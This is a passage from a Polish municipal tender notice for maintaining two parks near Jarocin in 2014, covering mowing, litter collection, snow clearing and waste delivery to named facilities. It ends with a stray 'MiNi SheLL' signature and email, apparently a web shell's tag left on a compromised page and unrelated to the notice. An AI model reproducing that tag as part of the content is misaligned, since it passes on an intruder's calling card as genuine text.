2. Park leśny przy ul. Wrocławskiej w Jarocinie o powierzchni około 4,3 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 0,45 ha  (koszenie - wysokość trawy nie może przekroczyć 10 cm), 
b) opróżnianiu koszy na odpady z częstotliwością zapewniającą czystość (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
c) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów,
d) wiosennym i jesiennym wygrabianiu liści,
e) zamiataniu chodników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
f) zamiataniu i wygrabianiu terenu wokół ławek i koszy parkowych z częstotliwością zapewniającą czystość (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
g) utrzymaniu czystości na całym terenie parku (sprzątanie odpadów z terenów zielonych z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
h) utrzymaniu czystości i porządku na placu zabaw (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek
i) bieżącym utrzymaniu czystości na stawie i w cieku Lipinka (odławianie odpadów, odblokowywanie zatorów itp.),
j) pracach innych tj. dodatkowych pracach porządkowych, naprawie ławek i koszy parkowych,
k) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu,
l) myciu ławek i koszy (przynajmniej raz w miesiącu).
ł) w okresie zimowym na bieżącym odśnieżaniu i posypywaniu piaskiem alei parkowych oraz schodów.

3. Park przy Sanktuarium w Golinie o powierzchni około 0,8 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 0,6 ha (koszenie - wysokość trawy nie może przekroczyć  10 cm), 
b) wiosennym i jesiennym wygrabianiu liści,
c) cięciu i pielęgnacji krzewów, pielenie chwastów (minimum 3 razy w sezonie),
d) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów, cięcia pielęgnacyjne,
e) bieżącym pieleniu terenów porośniętych bylinami i roślinami cebulowymi,
f) kontroli nawadniania (włączanie, wyłączanie, ustawianie i regulacja),
g) zamiataniu chodników i usuwaniu z nich chwastów (minimum 2 razy w tygodniu tj. poniedziałek, piątek),
h) opróżnianiu koszy parkowych (minimum 2 razy w tygodniu tj. poniedziałek, piątek),
i) zbieraniu odpadów z całego terenu (minimum 2 razy w tygodniu tj. poniedziałek, piątek),
j) myciu i konserwacji koszy parkowych, ławek i tabliczek mosiężnych (przynajmniej raz w miesiącu),
k) bieżącym oczyszczaniu stawu i strumienia,
l) konserwacji pompy lamp oświetleniowych,
ł) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu.

Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady komunalne zmieszane należy dostarczyć do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych( RIPOK) z siedzibą Witaszyczki 1a, 63-200 Jarocin.
Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady ulegające biodegradacji należy dostarczyć do Międzygminnej Kompostowni Osadów Ściekowych z siedzibą Cielcza, ul. Gajówka 1, 63-200 Jarocin.
Wykonawca zobowiązany jest do złożenia, Burmistrzowi Jarocina, do dnia 31 grudnia 2014 r., sprawozdania zawierającego informację o masie zebranych  i przekazanych w okresie wykonywania przedmiotu umowy, odpadów komunalnych zmieszanych oraz odpadów ulegających biodegradacji do RIPOK w Witaszyczkach. 
Koszty związane z zagospodarowaniem odpadów w RIPOK w Witaszyczkach oraz w Międzygminnej Kompostowni Osadów Ściekowych w Cielczy ponosił będzie Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com